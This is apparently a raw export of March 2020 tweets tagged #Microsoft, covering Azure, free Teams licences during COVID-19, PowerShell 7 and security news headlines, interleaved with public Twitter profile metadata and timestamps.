    <t>{'id': 142273481, 'id_str': '142273481', 'name': 'Rani Tiwari', 'screen_name': 'rani_tiwari', 'location': 'United States', 'description': 'Digital Evangelist for Fortune 2000 Orgs/ Story Teller/ Traveler/ Love Mountains/ Foodie/ a Seeker /Insomniac/ a workaholic IIM grad/Views=Mine #cloud #AI #ML', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 86, 'friends_count': 603, 'listed_count': 13, 'created_at': 'Mon May 10 12:43:56 +0000 2010', 'favourites_count': 410, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 761,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'http://pbs.twimg.com/profile_images/1218031962851610624/usMK_LZY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1218031962851610624/usMK_LZY_normal.jpg',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</si>
  <si>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13:22:29 +0000 2020</t>
  </si>
  <si>
    <t>REMINDER: short videos now available on YouTube document the Texas Childrens Hospital journey to digital transformation and the impact it has made. Major contributions from #HPE and #Microsoft #Azure and #AzureStack, #USEnterpriseEast  #HPEAlliances 
https://t.co/kTgT3ySjOv https://t.co/Qbtm4NAKiA</t>
  </si>
  <si>
    <t>{'id': 935144118107426817, 'id_str': '935144118107426817', 'name': 'Terry Richardson', 'screen_name': 'TREnterpriseVP', 'location': 'Boston, MA', 'description': 'HPE Vice President &amp; GM, Enterprise East Sales', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 727, 'friends_count': 369, 'listed_count': 10, 'created_at': 'Mon Nov 27 13:51:46 +0000 2017', 'favourites_count': 2591, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3532,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'http://pbs.twimg.com/profile_images/963834022202892294/H4F1MLwK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/963834022202892294/H4F1MLwK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/935144118107426817/1582217557',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</si>
  <si>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13:21:08 +0000 2020</t>
  </si>
  <si>
    <t>Over 600 Microsoft Subdomains Can Be Hijacked: Researchers
https://t.co/oJn2EFM6bI
#cybersecurity #security #ceptbiro #securite  #cybersecurite  #infosec #Microsoft #Hijacked</t>
  </si>
  <si>
    <t>{'id': 1884513522, 'id_str': '1884513522', 'name': 'CeptBiro', 'screen_name': 'CeptBiro', 'location': 'QuÃ©bec/Canada', 'description': '#CeptBiro #Securite #Cybersecurite #Infosec #Security #Cybersecurity #Siem #Architect https://t.co/MnrcP9LSfz', 'url': 'https://t.co/ajI9xlWppS', 'entities': {'url': {'urls': [{'url': 'https://t.co/ajI9xlWppS', 'expanded_url': 'https://www.ceptbiro.com', 'display_url': 'ceptbiro.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/MnrcP9LSfz', 'expanded_url': 'http://ht.ly/8rHq30iS5G1', 'display_url': 'ht.ly/8rHq30iS5G1', 'indices': [86, 109]}]}}, 'protected': False, 'followers_count': 254, 'friends_count': 2, 'listed_count': 609, 'created_at': 'Thu Sep 19 22:12:14 +0000 2013', 'favourites_count': 52, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 39528,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'http://pbs.twimg.com/profile_images/378800000480784583/735927632e46db966519d6342e6d0f04_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000480784583/735927632e46db966519d6342e6d0f04_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1884513522/1403268947', 'profile_link_color': 'FF691F',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</si>
  <si>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13:20:14 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft AI Awards 2.0 celebrates #innovation in AI within #India
@Microsoft
@Azure
@MicrosoftEDU https://t.co/1RSC0xjLHJ</t>
  </si>
  <si>
    <t>{'id': 2283358027, 'id_str': '2283358027', 'name': 'ChannelDrive.in', 'screen_name': 'ChannelDrive', 'location': '', 'description': 'ChannelDrive is an initiative from ERATO Solutions and an effort to bring together IT Leaders and Solution Providers.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 49, 'friends_count': 17, 'listed_count': 0, 'created_at': 'Thu Jan 09 09:50:47 +0000 2014', 'favourites_count': 5, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 937,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'http://pbs.twimg.com/profile_images/421219267472662528/-EXkklIi_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/421219267472662528/-EXkklIi_normal.jpeg',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</si>
  <si>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13:20:11 +0000 2020</t>
  </si>
  <si>
    <t>Enable that MF-ing MFA: 1.2 million Azure Active Directory accounts compromised every month, reckons Microsoft
https://t.co/wnVovyBjYM
#cybersecurity #security #ceptbiro #securite  #cybersecurite  #infosec #MFA #Azure #ActiveDirectoryAccounts #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 13:19:14 +0000 2020</t>
  </si>
  <si>
    <t>#Azure #FormRecognizer and #Microsoft #Flow to #Search Scanned #PDF Content in #SharePoint #SharepointOnline #CognitiveServices #Cloud
https://t.co/hAjJpD34Fr</t>
  </si>
  <si>
    <t>{'id': 78576155, 'id_str': '78576155', 'name': 'Sibeesh Venu', 'screen_name': 'SibeeshVenu', 'location': 'Birkenfeld, Deutschland', 'description': 'https://t.co/qgUFdZS3Zb, Microsoft MVP @MVPAward, @CsharpCorner MVP, @DZone MVB, Engineer, Writer. \nhttps://t.co/pLqBQycDUP, https://t.co/NPjjVotmB0', 'url': 'https://t.co/8ZGVpCsx8D', 'entities': {'url': {'urls': [{'url': 'https://t.co/8ZGVpCsx8D', 'expanded_url': 'https://SibeeshPassion.com', 'display_url': 'SibeeshPassion.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/qgUFdZS3Zb', 'expanded_url': 'http://sibeeshvenu.com', 'display_url': 'sibeeshvenu.com', 'indices': [0, 23]}, {'url': 'https://t.co/pLqBQycDUP', 'expanded_url': 'http://youtube.com/SibeeshPassion', 'display_url': 'youtube.com/SibeeshPassion', 'indices': [100, 123]}, {'url': 'https://t.co/NPjjVotmB0', 'expanded_url': 'http://youtube.com/njanorumalayali', 'display_url': 'youtube.com/njanorumalayali', 'indices': [125, 148]}]}}, 'protected': False, 'followers_count': 2899, 'friends_count': 1980, 'listed_count': 74, 'created_at': 'Wed Sep 30 11:20:43 +0000 2009', 'favourites_count': 900, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1896,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'http://pbs.twimg.com/profile_images/874237623270727680/iKkp3V15_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/874237623270727680/iKkp3V15_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/78576155/1497458737',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</si>
  <si>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13:18:18 +0000 2020</t>
  </si>
  <si>
    <t>Today, a free 6-month Office 365 E1 Trial, including Microsoft Teams, is now available. Microsoft is making this special E1 Trial license available in response to the COVID-19 (coronavirus) outbreak
https://t.co/hojybUBuC0 #Microsoft #leadingtheway</t>
  </si>
  <si>
    <t>{'id': 412616938, 'id_str': '412616938', 'name': 'Jerome Simeoni', 'screen_name': 'j32ome', 'location': 'Brighton &amp; London GB', 'description': 'Dynamics 365 Solution Architect - Pre-sales &amp; Alliance - Microsoft Dynamics 365 Evangelist @HitachiSolEU #Dynamics365 #PowerPlatform #PowerApps', 'url': 'https://t.co/h7UgmfO9SM', 'entities': {'url': {'urls': [{'url': 'https://t.co/h7UgmfO9SM', 'expanded_url': 'http://www.simeoni.co.uk', 'display_url': 'simeoni.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 98, 'friends_count': 182, 'listed_count': 5, 'created_at': 'Mon Nov 14 23:18:56 +0000 2011', 'favourites_count': 163, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 139,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'http://pbs.twimg.com/profile_images/1227344825755865088/SiazbtZe_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227344825755865088/SiazbtZe_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/412616938/1537617235',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</si>
  <si>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13:17:25 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft releases #PowerShell7 for #Windows, #macOS and #Linux https://t.co/9Rv4qIyBht</t>
  </si>
  <si>
    <t>Thu Mar 05 13:17:17 +0000 2020</t>
  </si>
  <si>
    <t>Over 600 Microsoft Subdomains Can Be Hijacked: Researchers
https://t.co/Ne7zKGF3XE
#cybersecurity #security #ceptbiro #securite  #cybersecurite  #infosec #Microsoft #Hijacked</t>
  </si>
  <si>
    <t>{'id': 100560178, 'id_str': '100560178', 'name': 'Rene Robichaud', 'screen_name': 'ReneRobichaud', 'location': 'Canada, QuÃ©bec', 'description': '#CyberSecurity #Security #InfoSec since 1996. Working at @CeptBiro https://t.co/koAbDM42AL https://t.co/LBKOzjWcy4 #CeptBiro Tweets are my own', 'url': 'https://t.co/ajI9xlWppS', 'entities': {'url': {'urls': [{'url': 'https://t.co/ajI9xlWppS', 'expanded_url': 'https://www.ceptbiro.com', 'display_url': 'ceptbiro.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/koAbDM42AL', 'expanded_url': 'http://ow.ly/PkwFL', 'display_url': 'ow.ly/PkwFL', 'indices': [67, 90]}, {'url': 'https://t.co/LBKOzjWcy4', 'expanded_url': 'http://ht.ly/upc7307EQhA', 'display_url': 'ht.ly/upc7307EQhA', 'indices': [91, 114]}]}}, 'protected': False, 'followers_count': 3606, 'friends_count': 1922, 'listed_count': 677, 'created_at': 'Wed Dec 30 18:12:20 +0000 2009', 'favourites_count': 2013, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 46367, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '1A1B1F', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/858762561004634112/QKrnif1X_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/858762561004634112/QKrnif1X_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/100560178/1447893788', 'profile_link_color': 'FAB81E',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</si>
  <si>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13:17:07 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft's solution for COVID-19 is a free Teams subscription for six months Read More: https://t.co/JOr7uaZSDw https://t.co/cCvXqLTbOX</t>
  </si>
  <si>
    <t>{'id': 823736070802128897, 'id_str': '823736070802128897', 'name': 'Computer Tips', 'screen_name': 'Comput3rTips', 'location': 'Pakistan', 'description': 'ComputerGeek is your Tips, Tricks and Reviews website. Here you can find all the technology updates, also valuable information regarding Blogging and SEO.', 'url': 'https://t.co/YUYAPPHzTJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/YUYAPPHzTJ', 'expanded_url': 'http://www.ComputerGeek.pk', 'display_url': 'ComputerGeek.pk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 71, 'friends_count': 96, 'listed_count': 4, 'created_at': 'Tue Jan 24 03:35:58 +0000 2017', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6884,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'http://pbs.twimg.com/profile_images/823738880461512704/9AWMzp51_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/823738880461512704/9AWMzp51_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/823736070802128897/1485229615',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</si>
  <si>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13:15:29 +0000 2020</t>
  </si>
  <si>
    <t>Enable that MF-ing MFA: 1.2 million Azure Active Directory accounts compromised every month, reckons Microsoft
https://t.co/VfqCEQ4Sre
#cybersecurity #security #ceptbiro #securite  #cybersecurite  #infosec #MFA #Azure #ActiveDirectoryAccounts #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 13:14:43 +0000 2020</t>
  </si>
  <si>
    <t>How to Reduce Costs of Implementing a New Accounting System | Gravity https://t.co/mNpVduX8Fo
#BusinessNews #tech #automation #TheresAnAppForThat #SmallBusinessOwner #Inventory #Database #Management #PowerBI #CRM #Microsoft #PowerPlatform #Service #CloudAccounting #CFO https://t.co/k5haCY8htI</t>
  </si>
  <si>
    <t>Thu Mar 05 13:13:00 +0000 2020</t>
  </si>
  <si>
    <t>Great cooperation today in Lisbon between #HPE s Barbara Hallmans &amp;amp; #Microsoft s Maria Jordan &amp;amp; team to demonstrate how #Enterprises can ignite #innovation in the #Cloud and at the #Edge
#HybridCloud #WomenIntech #WomenInSTEM #HPEAlliances @msPartner @HPE_Partner @Darmour_MSFT https://t.co/IjpL8HrlQA</t>
  </si>
  <si>
    <t>Thu Mar 05 13:12:42 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft's solution for #COVID-19 is a free #Teams subscription for six months | PCWorld https://t.co/OPI664tfO3</t>
  </si>
  <si>
    <t>Thu Mar 05 13:12:17 +0000 2020</t>
  </si>
  <si>
    <t>Latest Blog; How Microsoft Teams Could Help Architectural Practices. 
#CompexIT
#Microsoft
https://t.co/KiKS32d3KT</t>
  </si>
  <si>
    <t>{'id': 2982484780, 'id_str': '2982484780', 'name': 'CompexIT', 'screen_name': 'compex_it', 'location': 'Birmingham, UK', 'description': 'IT support for the Architectural, Engineering and Construction industries in Birmingham #office365 #itsupport #cybersecurity #itstrategy', 'url': 'https://t.co/Shi2HSL51x', 'entities': {'url': {'urls': [{'url': 'https://t.co/Shi2HSL51x', 'expanded_url': 'https://www.compexit.co.uk/engineering-construction/', 'display_url': 'compexit.co.uk/engineering-coâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 275, 'friends_count': 153, 'listed_count': 232, 'created_at': 'Sat Jan 17 12:07:02 +0000 2015', 'favourites_count': 13, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4049, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '15859D', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1191804306237861889/2pxQCBD5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1191804306237861889/2pxQCBD5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2982484780/1572983306', 'profile_link_color': '15859D',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</si>
  <si>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How many people used / remember this #Microsoft version control tool #Delta? https://t.co/ElUlSufQXA #VCS #versioncontrol</t>
  </si>
  <si>
    <t>{'id': 18597778, 'id_str': '18597778', 'name': 'Krishna Kishore (KK)', 'screen_name': 'kkbava', 'location': 'ÃœT: 12.734885,80.009684', 'description': 'Software, Family, Music, Learning &amp; Sharing...', 'url': 'https://t.co/Em7ls0mEJV', 'entities': {'url': {'urls': [{'url': 'https://t.co/Em7ls0mEJV', 'expanded_url': 'https://in.linkedin.com/in/krishnakishorebhavaraju', 'display_url': 'in.linkedin.com/in/krishnakishâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1216, 'friends_count': 744, 'listed_count': 163, 'created_at': 'Sun Jan 04 07:03:14 +0000 2009', 'favourites_count': 4763, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6221, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '59BEE4', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/881513280371544065/bpaw-Ti__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/881513280371544065/bpaw-Ti__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18597778/1457952054', 'profile_link_color': '8FCAE0', 'profile_sidebar_border_color': '4BB7DF', 'profile_sidebar_fill_color': '191F22', 'profile_text_color': '4BB7DF', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 13:11:39 +0000 2020</t>
  </si>
  <si>
    <t>Proud to be on the #ESTR20! Thank you @sportstechx for counting on #GSIC for another year and congratulations for your great work!
Get your copy of the report via download -&amp;gt; 
https://t.co/F3CB4kJtH9
#sport #SportsTech #innovation #technology #Microsoft #DigitalTransformation https://t.co/pTlPdXQ6F5</t>
  </si>
  <si>
    <t>{'id': 3246821553, 'id_str': '3246821553', 'name': 'Sport GSIC', 'screen_name': 'Sport_GSIC', 'location': '', 'description': 'Becoming a worldwide reference for the sports industry, from start-ups to enterprise organizations. Join the race!', 'url': 'https://t.co/Qs1CjsiixA', 'entities': {'url': {'urls': [{'url': 'https://t.co/Qs1CjsiixA', 'expanded_url': 'http://sport-gsic.com', 'display_url': 'sport-gsic.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2499, 'friends_count': 1738, 'listed_count': 58, 'created_at': 'Mon May 11 21:58:19 +0000 2015', 'favourites_count': 1982, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2337,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'http://pbs.twimg.com/profile_images/1084732503150264320/jNvFXhhe_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1084732503150264320/jNvFXhhe_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3246821553/1567168279',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</si>
  <si>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13:11:27 +0000 2020</t>
  </si>
  <si>
    <t>@prophix - we are expecting a full house at #Microsoft in #Mississauga for #FPAC2020
#mfg #MSDyn365 #MSDyn365BC #Office365 #Finance #CFO #Apps #MSApps #Toronto</t>
  </si>
  <si>
    <t>{'id': 2231806754, 'id_str': '2231806754', 'name': 'VOX ISM', 'screen_name': 'Vox_ISM', 'location': 'Ontario | Alberta', 'description': 'Certified Microsoft Dynamics Partner. Licensing, implementation, training and support of CRM, ERP and BI solutions across several industry verticals.', 'url': 'http://t.co/66dtaJ3DN4', 'entities': {'url': {'urls': [{'url': 'http://t.co/66dtaJ3DN4', 'expanded_url': 'http://www.voxism.com', 'display_url': 'voxism.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 440, 'friends_count': 433, 'listed_count': 149, 'created_at': 'Thu Dec 05 17:37:07 +0000 2013', 'favourites_count': 502, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6932,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'http://pbs.twimg.com/profile_images/901175635497762816/C7vJFPDb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/901175635497762816/C7vJFPDb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2231806754/1503692296', 'profile_link_color': '297CCF',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</si>
  <si>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13:11:16 +0000 2020</t>
  </si>
  <si>
    <t>Endless trade war and now the #CoronavirusOutbreak, prompted these tech giants to move their productions out of China. #tech #stockstowatch #apple #google #microsoft https://t.co/yKMPcGBcbp</t>
  </si>
  <si>
    <t>{'id': 151176870, 'id_str': '151176870', 'name': 'Geektown.ca', 'screen_name': 'GeektownCA', 'location': 'Canada', 'description': 'Lifestyle, travel and tech reviews from us to you.', 'url': 'https://t.co/xX3gkusj6n', 'entities': {'url': {'urls': [{'url': 'https://t.co/xX3gkusj6n', 'expanded_url': 'http://www.geektown.ca', 'display_url': 'geektown.ca', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1314, 'friends_count': 163, 'listed_count': 30, 'created_at': 'Wed Jun 02 20:06:03 +0000 2010', 'favourites_count': 88, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5545,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'http://pbs.twimg.com/profile_images/601621235852804096/WicfzoML_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/601621235852804096/WicfzoML_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/151176870/1413139312',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</si>
  <si>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13:11:08 +0000 2020</t>
  </si>
  <si>
    <t>What happened to Microsoft Virtual Academy (MVA)?
#Microsoft #Learn #skills #tech https://t.co/5w8cDzZGey https://t.co/c3yLH3BzoR</t>
  </si>
  <si>
    <t>{'id': 277465939, 'id_str': '277465939', 'name': 'Sylvester Addo', 'screen_name': 'silverscholar', 'location': 'ACC | LOS | NBO', 'description': "Writing about #Tech in #Africa and #MiddleEast @microsoftcaregh, often all things #Microsoft &amp; share #Africa #travel stories via IG @silverscholar. Let's talk.", 'url': 'https://t.co/QkaUsnxuZ7', 'entities': {'url': {'urls': [{'url': 'https://t.co/QkaUsnxuZ7', 'expanded_url': 'http://microsoftcaregh.com', 'display_url': 'microsoftcaregh.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 851, 'friends_count': 292, 'listed_count': 122, 'created_at': 'Tue Apr 05 12:40:39 +0000 2011', 'favourites_count': 1766, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 21298,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'http://pbs.twimg.com/profile_images/947987259403456512/JmE0Bym-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/947987259403456512/JmE0Bym-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/277465939/1438275567', 'profile_link_color': 'FF0000',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</si>
  <si>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Thu Mar 05 13:11:07 +0000 2020</t>
  </si>
  <si>
    <t>What happened to Microsoft Virtual Academy (MVA)?
#Microsoft #Learn #skills #tech https://t.co/DdPPuyPOfu https://t.co/sPMEqMFPRR</t>
  </si>
  <si>
    <t>{'id': 5426672, 'id_str': '5426672', 'name': 'Christopher Bennett', 'screen_name': 'chrisdof', 'location': 'Cape Town, South Africa', 'description': 'Geek, Technology Enthusiast, Wordpress Evangelist, Blogger, Technology Consultant, Conference Ninja, Internet Entrepreneur, Internet Addict.', 'url': 'https://t.co/6zoZwavtqx', 'entities': {'url': {'urls': [{'url': 'https://t.co/6zoZwavtqx', 'expanded_url': 'http://www.microsoftcaregh.com', 'display_url': 'microsoftcaregh.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1082, 'friends_count': 1297, 'listed_count': 116, 'created_at': 'Mon Apr 23 09:01:55 +0000 2007', 'favourites_count': 206, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 14854, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FFC939', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme19/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme19/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1080154318119030784/3S0SI0l6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1080154318119030784/3S0SI0l6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/5426672/1566231703', 'profile_link_color': '0099CC', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'F6FFD1', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 13:11:05 +0000 2020</t>
  </si>
  <si>
    <t>What happened to Microsoft Virtual Academy (MVA)?
#Microsoft #Learn #skills #tech https://t.co/wxWRSgs3KF https://t.co/vqgBZINTWR</t>
  </si>
  <si>
    <t>{'id': 942633216191627269, 'id_str': '942633216191627269', 'name': 'MCGH', 'screen_name': 'Microsoftcaregh', 'location': 'Middle East and Africa', 'description': 'Latest in #Microsoft #Tech #News, Events, Reviews, etc. across #MiddleEast &amp; #Africa. Led by @chrisdof @silverscholar  Tips/info/etc.: info@microsoftcaregh.com', 'url': 'https://t.co/6zoZwavtqx', 'entities': {'url': {'urls': [{'url': 'https://t.co/6zoZwavtqx', 'expanded_url': 'http://www.microsoftcaregh.com', 'display_url': 'microsoftcaregh.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 180, 'friends_count': 4, 'listed_count': 0, 'created_at': 'Mon Dec 18 05:50:46 +0000 2017', 'favourites_count': 93, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1519, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1057972757483397121/VaMYmECD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1057972757483397121/VaMYmECD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/942633216191627269/1513577030',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</si>
  <si>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13:07:56 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Outlook Shortcuts #2
#jetkingpbr 
#jetking 
#jetkingporbandar 
#jetkingstudent
#Microsoft
#MicrosoftOutlook
#windows10
#windowsos
#windowsshortcut
#windows 
#windowstrick
#windows https://t.co/nk0ewBjYrV</t>
  </si>
  <si>
    <t>{'id': 1200750734368624642, 'id_str': '1200750734368624642', 'name': 'Jetking Porbandar Learning Center', 'screen_name': 'JetkingPbr', 'location': 'Porbandar, India', 'description': 'Jetking Porbandar Learning Center Providing Career Courses', 'url': 'https://t.co/B3mtu7ZnXe', 'entities': {'url': {'urls': [{'url': 'https://t.co/B3mtu7ZnXe', 'expanded_url': 'https://linktr.ee/jetkingpbr', 'display_url': 'linktr.ee/jetkingpbr', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 26, 'listed_count': 0, 'created_at': 'Sat Nov 30 12:17:53 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 146, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1235519329828917251/4MJPEA4w_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235519329828917251/4MJPEA4w_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1200750734368624642/1583405740',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</si>
  <si>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13:07:17 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Store all your files in one place.#Onedrive
Easily store and share photos, videos, documents, and more - AnyTIME AnyWHERE
#Storage #Microsoftsupport #Microsoftcontact #Microsofthelpline #Microsoftnumber
Tollfree Australia 1800-517-221 https://t.co/ROZsl3Xaf0</t>
  </si>
  <si>
    <t>{'id': 4925234066, 'id_str': '4925234066', 'name': 'MyTech', 'screen_name': 'mytech_squad', 'location': 'South Australia, Australia', 'description': 'MyTechSquad Computer Tech Support \nComputer Repair Services in Australia Microsoft Partners in Wollongong', 'url': 'https://t.co/zI3KUwwo3R', 'entities': {'url': {'urls': [{'url': 'https://t.co/zI3KUwwo3R', 'expanded_url': 'https://www.mytechsquad.com.au/', 'display_url': 'mytechsquad.com.au', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 105, 'friends_count': 198, 'listed_count': 4, 'created_at': 'Thu Feb 18 11:28:59 +0000 2016', 'favourites_count': 5, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1020, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/720936209283989506/i8kxhG5-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/720936209283989506/i8kxhG5-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4925234066/1576499196',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</si>
  <si>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13:07:02 +0000 2020</t>
  </si>
  <si>
    <t>Why should you replace your #Microsoft CA with GlobalSign #SaaS #CA? GlobalSign manages the #security, high availability and CA operations, ensuring you meet SLAs and compliance audits. Learn how we can help you by visiting the link attached. https://t.co/vk0E2MePNw https://t.co/JGdMwGGnPQ</t>
  </si>
  <si>
